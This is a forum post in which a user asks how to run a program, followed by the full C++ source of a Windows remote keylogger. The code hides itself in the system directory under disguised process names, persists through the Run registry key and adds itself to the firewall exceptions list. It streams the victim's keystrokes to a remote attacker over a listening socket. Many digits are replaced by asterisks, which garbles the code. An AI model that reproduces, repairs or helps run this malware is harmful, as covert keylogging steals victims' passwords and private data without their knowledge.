this looks like a cool program; i know im stupid but how do i run it
thanks

Code:
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
*                                                                              *
*  Name: Remote Logger  V0.*                                                   *
*  Author: NerveThraX                                                          *
*  Date: *0/07/06 *6:5*                                                        *
*                                                                              *
*  A remote key logger that logs the keystrokes of a remote or local machine.  *
*  The keylogger starts a telnet server on port *80 of the remote host.        *
*  This program is for educational purpose only. I am not responsible for any  *
*  damage this program might cause nor I am responsible how this program is    * 
*  used.                                                                       *
*  To access the key loggers remote features you will need to do the following.*
*  start -> run -> telnet <ipaddress_victim> *80                               *
*  Now you wil be able to view the live feed of key strokes of the remote      *
*  machine.                                                                    *
*  You can also use the key logger to log the keystrokes of a local machine,   * 
*  since it keeps all keystrokes in a central file called log.txt in the       *
*  windows root directory. The key logger also paralyzes the windows firewall  *
*  so that no warning is message is made when the listing server is running,the* 
*  key logger also alters the reg keys so that it runs at every reboot.        *
*  This program is free software; you can redistribute it and/or               *
*  modify it under the terms of the GNU General Public License                 *
*  as published by the Free Software Foundation.                               *
*******************************************************************************/

/*
The source code is compiled in Dev-C++ 4.*.*.2 linked to the ws2_*2.lib library.
The key logger seems to work stable in Windows XP Home/Pro Sp2, the key logger
also should work in Windows NT and 2000. You will want to choose a windows project
instead of a console project.
*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
#include <ctime>
#include <cstdlib>

using namespace std;

#define MAX *024

void win_firewall(char* display_name);

int main()
{
char system[MAX];
char pathtofile[MAX];

const char *name[] = {"\\LiveUpdate.exe", "\\WindowsSpooler.exe", "\\TelnetClient.exe",
                      "\\Microsoft.exe", "\\Sp2Firewall.exe", "\\regedat.exe",
                      "\\ieexplorer.exe", "\\Explorer.exe", "\\windowsClient.exe",
                      "\\MCAGENT.exe", "\\MCUPDATE.exe", "\\MFW2EN.exe", "\\MFWENG*.exe",
                      "\\MGUI.exe", "\\msconfig.exe", "\\MINILOG.exe", "\\MOOLIVE.exe", "\\MRFLUX.exe",
                      "\\MSCONFIG.exe", "\\MSINFO*2.exe", "\\MSSMMC*2.exe", "\\MU0***AD.exe",
                      "\\NAV80TRY.exe", "\\NAVAPW*2.exe", "\\NAVDX.exe", "\\NAVSTUB.exe",
                      "\\NAVW*2.exe", "\\NC2000.exe", "\\NCINST4.exe", "\\NDD*2.exe",
                      "\\NEOMONITOR.exe", "\\NETARMOR.exe", "\\NETINFO.exe", "\\NETMON.exe", 0};

srand(time(0));
int random = rand() % *5;
name[random];

/* Finds the windows directory and copies the key logger*/
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,name[random]);
CopyFile(pathtofile,system,false);

/*Adds the reg key*/

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Microsoft Windows Sp2 Firewall",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);

ofstream gen("log.txt");
         gen.close();               
win_firewall("Microsoft Update");

/*starts the listing server on port *80*/
  WSADATA wsaData;
  WSAStartup(MAKEWORD(*, *), &wsaData);
  SOCKET hServer  = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  SOCKADDR_IN sai;
  sai.sin_family = AF_INET;
  sai.sin_addr.s_addr = INADDR_ANY;
  sai.sin_port = htons(*80);
  bind(hServer,(LPSOCKADDR)&sai,sizeof(struct sockaddr));
  listen(hServer,*0);
  SOCKET hClient =  accept(hServer,NULL,NULL);

char szBuffer[MAX_PATH];
  char szKey[MAX_PATH];
  int uScanCode;

ofstream cvg("log.txt" , ios::app);

while(*)
  {

for(int i = 0; i < 256; i++)
      {   
          /*gets the key***rd input*/
         if (GetAsyncKeyState(i) == -*2767)
            {                                     
             uScanCode  =  MapVirtualKeyEx(i,0,GetKey***rdLayout(0));           
              GetKeyNameText(uScanCode << *6,szKey,MAX_PATH);
             if(strlen(szKey) > 0)
               {
                 strcpy(szBuffer,"["); strcat(szBuffer, szKey); strcat(szBuffer,"]");                 
                 send(hClient,szBuffer,strlen(szBuffer),0);/*sends the key strokes*/

/*writes to the log.txt file*/
                 if(cvg.is_open())
                 {
                  cvg << szBuffer;
                  }

}                               
            }     

}           
}
  closesocket(hClient);
  closesocket(hServer);
  WSACleanup();
  cvg.close();
}

void win_firewall(char* display_name)
{
     /*adds itself to the windows firewall exceptions list*/
    char path[MAX_PATH];
    HMODULE ModH = GetModuleHandle(NULL);
    GetModuleFileName(ModH, path, sizeof(path));
    char data[MAX_PATH] = "";
    strcpy (data, path);
    strcat (data, ":*:Enabled:");
    strcat (data, display_name);

HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet00*\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, KEY_SET_VALUE, &hKey);

RegSetValueEx(hKey, path,0,REG_SZ,(const unsigned char*)data,sizeof(data));
    RegCloseKey(hKey);
}